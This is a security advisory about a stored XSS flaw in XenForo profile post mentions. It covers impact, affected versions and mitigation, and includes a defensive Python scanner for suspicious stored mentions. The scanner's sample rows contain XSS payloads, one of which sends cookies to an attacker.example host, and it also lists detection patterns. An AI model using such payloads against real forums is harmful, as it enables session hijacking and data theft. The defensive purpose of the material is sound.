Platform
php
Component
xenforo-2-xss
Fixed in
2.3.10
2.2.19
CVE-2026-35057 is a stored cross-site scripting (XSS) vulnerability in XenForo. An attacker can inject script through crafted mentions placed in legacy profile post content; the payload is saved with the post and runs in the browser of anyone who later views it. Per the Fixed in list above, the fix ships in 2.3.10 for the 2.3 branch and 2.2.19 for the 2.2 branch, so 2.3 releases from 2.3.0 up to, but not including, 2.3.10 should be treated as affected, along with 2.2 releases earlier than 2.2.19. Upgrade promptly.
Successful exploitation of CVE-2026-35057 lets an attacker execute arbitrary JavaScript in another user's browser, in that user's session context. Consequences include session hijacking, performing actions as the victim (including a moderator or administrator who views the post), forum defacement, redirection to phishing pages, and theft of data the script can reach. HttpOnly cookies blunt direct cookie theft but do not stop the script from issuing requests with the victim's session. Because the flaw is stored, a single injected mention persists and affects every user who views the content, so one post can reach many sessions over time. The affected code path is the rendering of legacy profile post content, which suggests that older installations and forums that have been through a migration are the most likely to carry such content.
CVE-2026-35057 was publicly disclosed on April 1, 2026. No public proof-of-concept (PoC) code had been released at the time of writing, and the vulnerability is not listed in CISA KEV. Stored XSS is straightforward to weaponize once the injection point is known and the disclosure is public, so attempts against unpatched XenForo instances should be expected.
Exploit Status
EPSS
0.03% (8th percentile)
CISA SSVC
CVSS Vector
The primary mitigation for CVE-2026-35057 is to upgrade XenForo to 2.3.10 (or 2.2.19 on the 2.2 branch) or later, which contains the fix. If you cannot upgrade immediately, apply strict validation and sanitization to user-generated content, particularly the display text of mentions in profile posts, and treat that as a stopgap rather than a fix. A Web Application Firewall (WAF) configured to block XSS payloads aimed at profile post submission adds a thin temporary layer, but WAF rules are routinely bypassed and only inspect the injection request, not content that is already stored. Review forum logs for unusual profile post creation and edits, and after upgrading, review already-stored profile post content for mention markup containing HTML or script: the stored payload stays in the database until it is removed, even once the fixed renderer neutralizes it.
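The content review described above, as an added example that is not part of the advisory and not XenForo's own code: it scans constructed sample profile post records for mentions whose display text contains markup, inline event handlers, javascript: URIs or entity-encoded characters, and shows the hardened rendering pattern (escape the display text as data) beside it. The `[USER=id]...[/USER]` mention form is assumed to match XenForo's BBCode mention syntax, the `/members/<id>/` link path is assumed, and the sample rows are constructed; in a real hunt you would feed rows from the profile post table instead.

```python
import html
import re

# Constructed sample records shaped like profile post rows (id plus message text).
# The [USER=id]display[/USER] form is assumed to match XenForo's BBCode mention
# syntax; confirm it against your own stored content before relying on the regex.
SAMPLE_POSTS = [
    {"profile_post_id": 1, "message": "Welcome [USER=2]@alice[/USER]!"},
    {"profile_post_id": 2, "message": "Hi [USER=3]<script>document.location="
                                      "'https://attacker.example/?c='+document.cookie</script>[/USER]"},
    {"profile_post_id": 3, "message": "[USER=4]<img src=x onerror=alert(1)>[/USER] look"},
    {"profile_post_id": 4, "message": "thanks [USER=5]@bob <3[/USER]"},
    {"profile_post_id": 5, "message": "see [USER=6]javascript:alert(1)[/USER]"},
]

MENTION_RE = re.compile(r"\[USER=(\d+)\](.*?)\[/USER\]", re.IGNORECASE | re.DOTALL)

# Things that should never appear in what is supposed to be a plain @username.
# Order matters only for the order of indicator names in the findings.
PAYLOAD_PATTERNS = {
    "html_tag": re.compile(r"<\s*/?\s*[a-z][^>]*>", re.IGNORECASE),
    "event_handler": re.compile(r"\bon[a-z]+\s*=", re.IGNORECASE),
    "javascript_uri": re.compile(r"javascript\s*:", re.IGNORECASE),
    "html_entity": re.compile(r"&#x?[0-9a-f]+;?", re.IGNORECASE),
}


def suspicious_mentions(message):
    """Return every mention in `message` whose display text looks like markup or script."""
    findings = []
    for match in MENTION_RE.finditer(message):
        user_id, display = int(match.group(1)), match.group(2)
        hits = [name for name, pat in PAYLOAD_PATTERNS.items() if pat.search(display)]
        if hits:
            findings.append({"user_id": user_id, "display": display, "indicators": hits})
    return findings


def hunt(posts):
    """Map profile_post_id -> findings for every post with at least one suspicious mention."""
    results = {}
    for post in posts:
        findings = suspicious_mentions(post["message"])
        if findings:
            results[post["profile_post_id"]] = findings
    return results


def render_mention(user_id, display):
    """Hardened rendering pattern: the display text is data, so it is HTML-escaped
    before being placed inside the anchor. The vulnerable shape of this code would
    concatenate `display` into the markup unescaped. The /members/<id>/ path is assumed."""
    return '<a href="/members/%d/">%s</a>' % (user_id, html.escape(display, quote=True))


if __name__ == "__main__":
    for post_id, findings in hunt(SAMPLE_POSTS).items():
        for f in findings:
            print(f"profile_post {post_id}: mention of user {f['user_id']} "
                  f"flagged ({', '.join(f['indicators'])}): {f['display']!r}")
```

Note that a plain `<3` in a username is not flagged, since the tag pattern requires a letter after `<`; tune the patterns against your own data rather than treating a hit as proof of compromise, and treat flagged rows as leads for log review of who posted them and when.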
Update XenForo to version 2.3.10 or 2.2.19, or later, to fix the XSS vulnerability. This prevents script injection through mentions in structured text.
CVE-2026-35057 is a stored Cross-Site Scripting (XSS) vulnerability in XenForo, fixed in 2.3.10 and, on the 2.2 branch, 2.2.19, that allows attackers to inject malicious scripts via crafted mentions in legacy profile post content.
You are affected if you run a XenForo 2.3 release earlier than 2.3.10 or a 2.2 release earlier than 2.2.19. Upgrade to 2.3.10 or 2.2.19, or later, to resolve the vulnerability.
Upgrade XenForo to 2.3.10 or 2.2.19, or later. Input validation and a WAF are only temporary mitigations, not a fix.
No active exploitation has been confirmed, but the vulnerability is publicly known and may be targeted by attackers.
Refer to the official XenForo security advisory on their website for detailed information and updates.